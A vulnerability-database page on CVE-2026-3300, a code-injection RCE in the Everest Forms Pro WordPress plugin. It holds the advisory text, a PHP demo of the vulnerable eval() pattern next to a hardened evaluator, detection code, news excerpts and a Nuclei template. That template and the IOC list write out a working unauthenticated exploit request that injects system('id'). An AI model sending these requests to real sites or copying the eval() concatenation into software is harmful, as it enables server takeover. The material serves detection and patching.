CVE-2026-3300
published 2026-03-31
CVE-2026-3300: The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is…
Priority P192 · critical 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS 40.99% (98.5th percentile)
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
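The sentence above describes the whole bug: a filter that was designed for HTML output is used as the only barrier before form input is spliced into PHP source and handed to eval(). The block below is an added illustration written for this page, not the plugin's code and not the vendor's fix. It models that shape with a stand-in for sanitize_text_field(), a placeholder-substitution formula evaluator that eval()s the result, and a hardened alternative that validates each value as a plain number and evaluates the formula with a small arithmetic parser instead of the interpreter. The function and class names (mock_sanitize_text_field, vulnerable_calc, safe_calc, SafeFormula, Probe), the {field_x} placeholder syntax and the sample formula are all assumptions made for the demo; the hostile value copies the quote-breakout shape of the probe quoted later on this page but flips a flag instead of calling system().

```php
<?php
declare(strict_types=1);

// Added illustration, not the plugin's code: a model of the CWE-94 shape the advisory describes
// (sanitize_text_field()-style filtering, then concatenation into PHP source, then eval()) next to a
// hardened evaluator that never turns form input into code. All names here are hypothetical.

// Stand-in for WordPress sanitize_text_field(): strips tags, control characters and outer whitespace,
// and, like the real function, leaves single quotes and semicolons alone.
function mock_sanitize_text_field(string $s): string {
    return trim(preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags($s)) ?? '');
}

// Flag the injected statement flips, so the demo proves code execution without calling system().
final class Probe { public static bool $hit = false; }

// Vulnerable shape: each {field_x} placeholder becomes a single-quoted PHP literal built from the
// sanitized value, and the whole formula is eval()ed. A value containing ' ends the literal early.
function vulnerable_calc(string $formula, array $fields): mixed {
    $code = preg_replace_callback('/\{(field_[A-Za-z0-9]+)\}/', function (array $m) use ($fields): string {
        $v = mock_sanitize_text_field((string) ($fields[$m[1]] ?? ''));
        return "'" . $v . "'";   // no escaping for the string-literal context: this is the bug
    }, $formula);
    return eval('$result = ' . $code . '; return $result;');
}

// Hardened shape: values must be plain decimal numbers, and the formula goes through a tiny
// arithmetic parser rather than the PHP interpreter, so there is no code context to break out of.
function safe_calc(string $formula, array $fields): float {
    $expr = preg_replace_callback('/\{(field_[A-Za-z0-9]+)\}/', function (array $m) use ($fields): string {
        $v = trim((string) ($fields[$m[1]] ?? ''));
        if (!preg_match('/^-?\d+(\.\d+)?$/', $v)) {
            throw new InvalidArgumentException("field {$m[1]} is not numeric");
        }
        return '(' . $v . ')';
    }, $formula);
    return (new SafeFormula($expr))->evaluate();
}

// expr := term (('+'|'-') term)* ; term := factor (('*'|'/') factor)* ; factor := number | '(' expr ')' | '-' factor
final class SafeFormula {
    private array $t;
    private int $p = 0;

    public function __construct(string $expr) {
        preg_match_all('/\d+(?:\.\d+)?|[+\-*\/()]/', $expr, $m);
        $this->t = $m[0];
        if (implode('', $this->t) !== preg_replace('/\s+/', '', $expr)) {   // anything else is rejected
            throw new InvalidArgumentException('formula contains characters outside the arithmetic grammar');
        }
    }
    public function evaluate(): float {
        $v = $this->expr();
        if ($this->p !== count($this->t)) {
            throw new InvalidArgumentException('unexpected trailing tokens');
        }
        return $v;
    }
    private function expr(): float {
        $v = $this->term();
        while (in_array($this->t[$this->p] ?? null, ['+', '-'], true)) {
            $v = $this->t[$this->p++] === '+' ? $v + $this->term() : $v - $this->term();
        }
        return $v;
    }
    private function term(): float {
        $v = $this->factor();
        while (in_array($this->t[$this->p] ?? null, ['*', '/'], true)) {
            $op = $this->t[$this->p++];
            $r  = $this->factor();
            if ($op === '/' && $r === 0.0) {
                throw new DivisionByZeroError('division by zero in formula');
            }
            $v = $op === '*' ? $v * $r : $v / $r;
        }
        return $v;
    }
    private function factor(): float {
        $tok = $this->t[$this->p++] ?? throw new InvalidArgumentException('unexpected end of formula');
        if ($tok === '(') {
            $v = $this->expr();
            if (($this->t[$this->p++] ?? null) !== ')') {
                throw new InvalidArgumentException('missing closing parenthesis');
            }
            return $v;
        }
        if ($tok === '-') {
            return -$this->factor();
        }
        return is_numeric($tok) ? (float) $tok : throw new InvalidArgumentException("unexpected token '$tok'");
    }
}

// Demo: a formula of the kind the Complex Calculation feature evaluates, fed a normal value and then
// a value shaped like this page's probe (quote breakout, a statement, echo ' to re-balance the quote).
$formula = '2 * {field_text}';
$benign  = ['field_text' => '21'];
$hostile = ['field_text' => "1'; Probe::\$hit = true; echo '"];

var_dump(vulnerable_calc($formula, $benign));
vulnerable_calc($formula, $hostile);   // eval()s: $result = 2 * '1'; Probe::$hit = true; echo ''; return $result;
var_dump(Probe::$hit);                 // the attacker-controlled statement ran

var_dump(safe_calc($formula, $benign));
try {
    safe_calc($formula, $hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The point of the hardened half is not the parser itself but the shape of the control: the decision is made on the value (is it a number?) and the formula never becomes PHP source. Escaping the quote with addslashes() or var_export() would close this particular breakout but would still leave eval() one missed context away from the same outcome.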
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpeverest | everest_forms_pro | <= 1.9.12 | 1.9.13 |
Detection & IOCs (extracted from sources)
command: action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}
- Use the Nuclei regex matcher 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)' on HTTP response bodies to confirm successful RCE via the system('id') probe payload. The matcher only confirms that probe; a real attacker's payload will not echo uid/gid into the response.
- A trailing // comment marker after the injected PHP is one syntactic indicator: look for form field values matching single-quote + PHP statement + // in POST bodies to the Everest Forms endpoints. The probe quoted on this page closes the injection differently, with echo ' re-balancing the string literal, so hunt for both shapes; a single quote followed by a semicolon is the common prefix. The probe also needs the form's nonce, so expect a GET of the page hosting the form shortly before the admin-ajax.php POST.
- Identify vulnerable installations by detecting Everest Forms Pro versions up to and including 1.9.12 in WordPress plugin directories; version 1.9.13 contains the patch.
- sanitize_text_field() on the form input does NOT escape single quotes or other PHP code-context characters, so it is not a security control for an eval() context. Defenders should not treat its presence as mitigation.
- The vulnerability is exploitable by unauthenticated attackers on any form that uses the 'Complex Calculation' feature; no login or privilege is required to trigger RCE.
- All string-type field types (text, email, URL, select, radio) are attack surface when the Complex Calculation addon is active, not just numeric fields.
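The indicators above are stated as patterns; the block below, an added example that is not from any of the cited sources, turns them into runnable checks. It decodes captured admin-ajax.php POST bodies the way PHP itself does (parse_str), flags any everest_forms[form_fields][...] value that shows the quote-breakout shape in either of its closers (// comment or echo ' re-balance), applies the page's uid/gid matcher to response bodies, and compares a plugin version string against the 1.9.13 fix release. The form id, field ids, the apostrophe-in-a-name decoy and the JSON response bodies are constructed for the demo; the action name and both regexes are the ones quoted on this page. Ordinary web-server access logs do not contain POST bodies, so the input is assumed to come from a WAF or ModSecurity audit log, a reverse-proxy body capture, or a pcap.

```php
<?php
declare(strict_types=1);

// Added example, not from any cited source: request-side and response-side checks for the
// indicators listed above, run over constructed samples. Field ids, form id and responses are made up.

const EVF_ACTION = 'everest_forms_ajax_form_submission';
// A single quote ends the injected literal, a statement follows, and the injection is closed either by
// a // line comment (discarding the rest of the generated code) or by echo ' (re-balancing the literal).
const EVF_INJECTION_RE = '#\'\s*;.*?(//|;\s*echo\s+\')\s*$#s';
// Response-side confirmation for the system('id') probe only (the matcher quoted on this page).
const ID_PROBE_RE = '/uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)/';

/** One finding per form field whose url-decoded value looks like a PHP quote breakout. */
function scan_submission(string $body): array {
    parse_str($body, $p);   // url-decodes and rebuilds the everest_forms[...][...] nesting
    if (($p['action'] ?? null) !== EVF_ACTION) {
        return [];
    }
    $findings = [];
    foreach ((array) ($p['everest_forms']['form_fields'] ?? []) as $fieldId => $value) {
        if (is_string($value) && preg_match(EVF_INJECTION_RE, $value, $m)) {
            $findings[] = [
                'field'  => (string) $fieldId,
                'closer' => $m[1] === '//' ? 'comment' : 'echo-rebalance',
                'value'  => $value,
            ];
        }
    }
    return $findings;
}

/** True when a successful admin-ajax submission response carries the probe's id output. */
function response_confirms_probe(string $body): bool {
    return str_contains($body, '"success":true') && preg_match(ID_PROBE_RE, $body) === 1;
}

/** Plugin header "Version:" value compared against the fix release named on this page. */
function evf_pro_is_vulnerable(string $version): bool {
    return version_compare($version, '1.9.13', '<');
}

// Constructed samples: a legitimate submission with an apostrophe in a name (must not fire), then the
// two injection shapes, each aimed at a text field while the calculation field is left at 0.
$base = 'action=' . EVF_ACTION . '&everest_forms[id]=12&everest_forms[author]=1';
$samples = [
    'benign'  => $base . '&everest_forms[form_fields][field_a1b2]=Alice+O%27Brien&everest_forms[form_fields][field_c3d4]=0',
    'echo'    => $base . "&everest_forms[form_fields][field_a1b2]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][field_c3d4]=0",
    'comment' => $base . "&everest_forms[form_fields][field_a1b2]=1'%3B+system('id')%3B+//&everest_forms[form_fields][field_c3d4]=0",
];
foreach ($samples as $label => $body) {
    $hits = scan_submission($body);
    printf("%-8s %s\n", $label, $hits ? json_encode($hits) : 'no indicator');
}

// Constructed response bodies: the probe's output leaking through the AJAX JSON, and a clean one.
$leaked = '{"success":true,"message":"uid=33(www-data) gid=33(www-data) groups=33(www-data)"}';
$clean  = '{"success":true,"message":"Thanks for contacting us!"}';
var_dump(response_confirms_probe($leaked), response_confirms_probe($clean));

var_dump(evf_pro_is_vulnerable('1.9.12'), evf_pro_is_vulnerable('1.9.13'));
```

Decode before matching: the raw body carries the payload as 1'%3B+system('id')%3B+echo+', so a regex applied to the undecoded line would need to account for %3B and + as well as the literal characters. The closer classification is worth keeping in the finding because the two shapes have different consequences for the victim (the // variant also comments out whatever followed the placeholder in the generated code).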
CVSS provenance
NVD · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck · 9.8 CRITICAL
GHSA
GHSA-jfqc-5rvh-wp99 · ghsa_unreviewed · 2026-03-31 · CVE-2026-3300 [CRITICAL] · CWE-94
Description: identical to the NVD text above.
VulnCheck
CVE-2026-3300 [CRITICAL] · vulncheck · 2026 · CVSS 9.8
wpeverest everest_forms: Improper Control of Generation of Code ('Code Injection')
Description: identical to the NVD text above.
No detection rules found.
Nuclei
Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
nuclei·CVSS 9.8
CVE-2026-3300 [CRITICAL] Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
```yaml
# The template head (id, info, the first GET request that fetches the form page, and the start of its
# extractors) was lost in extraction. The fragment resumes inside the regex list of the extractor that
# populates {{text_field}}; {{form_id}}, {{nonce_field}} and {{nonce}} are extracted in that same lost part.
          - '…]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
      - type: regex
        name: calc_field
        internal: true
        group: 1
        regex:
          - 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=[0-9]+\([a-z_-]+\)'

      - type: word
        part: body
        words:
          - '"success":true'

    extractors:
      - type: regex
        group: 0
        regex:
          - 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)'
```
Hackernews
⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
blogs_hackernews·2026-06-08·CVSS 8.4
CVE-2025-48595 [HIGH] ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
## ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
Monday again. The weekend was meant to be quiet. It wasn't. Last week had poisoned packages, a broken AI helper, and a worm tearing through repos. The ugly part: basic tricks still worked.
A chatbot got fooled. A bot token got leaked inside the malware. The same old mistakes showed up again. And while everyone chased the loud stuff, quieter attackers sat in inboxes for months, reading mail and stealing it bit by bit.
Lots to cover. Grab coffee. Read up.
## ⚡ Threat of the Week
Miasma Worm Hits 73 Microsoft GitHub Repositories in Supply Chain
Bleepingcomputer
Critical Everest Forms Pro flaw exploited to take over WordPress sites
blogs_bleepingcomputer·2026-06-06·CVSS 9.8
CVE-2026-3300 [CRITICAL] Critical Everest Forms Pro flaw exploited to take over WordPress sites
## Critical Everest Forms Pro flaw exploited to take over WordPress sites
By Bill Toulas
Hackers are actively exploiting a critical vulnerability (CVE-2026-3300) in the Everest Forms Pro plugin, which lets them take complete control of a WordPress website.
The security issue affects versions 1.9.12 and earlier of the plugin and can be leveraged without authentication to execute arbitrary code on the server.
Everest Forms Pro is a commercial add-on for the WordPress form builder plugin Everest Forms. It is used to create contact, registration, payment, and other custom application forms.
The CVE-2026-3300 vulnerability is in the plugin’s Complex Calculation feature, which accepts values submitted through form fields and inserts them into a PHP code string. Then, it executes the resulti
Hackernews
Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites
blogs_hackernews·2026-06-05·CVSS 9.8
CVE-2026-3300 [CRITICAL] Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites
## Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites
Threat actors are actively exploiting a critical security flaw in Everest Forms Pro, a WordPress plugin with about 4,000 active installations, to execute arbitrary code, leading to a complete site compromise.
The vulnerability in question is CVE-2026-3300 (CVSS score: 9.8), a remote code execution bug impacting all versions of the plugin up to, and including, 1.9.12. A patch for the flaw was released on March 18, 2026, with version 1.9.13.
"This is due to the Calculation Addon's process_filter() function concatenating user-submitted form fie
Wiz
CVE-2026-3300 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-3300 [CRITICAL] CVE-2026-3300 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3300: WordPress vulnerability analysis and mitigation
Description (Source: NVD): identical to the NVD text above.
Published 2026-03-31 · Exploited in the wild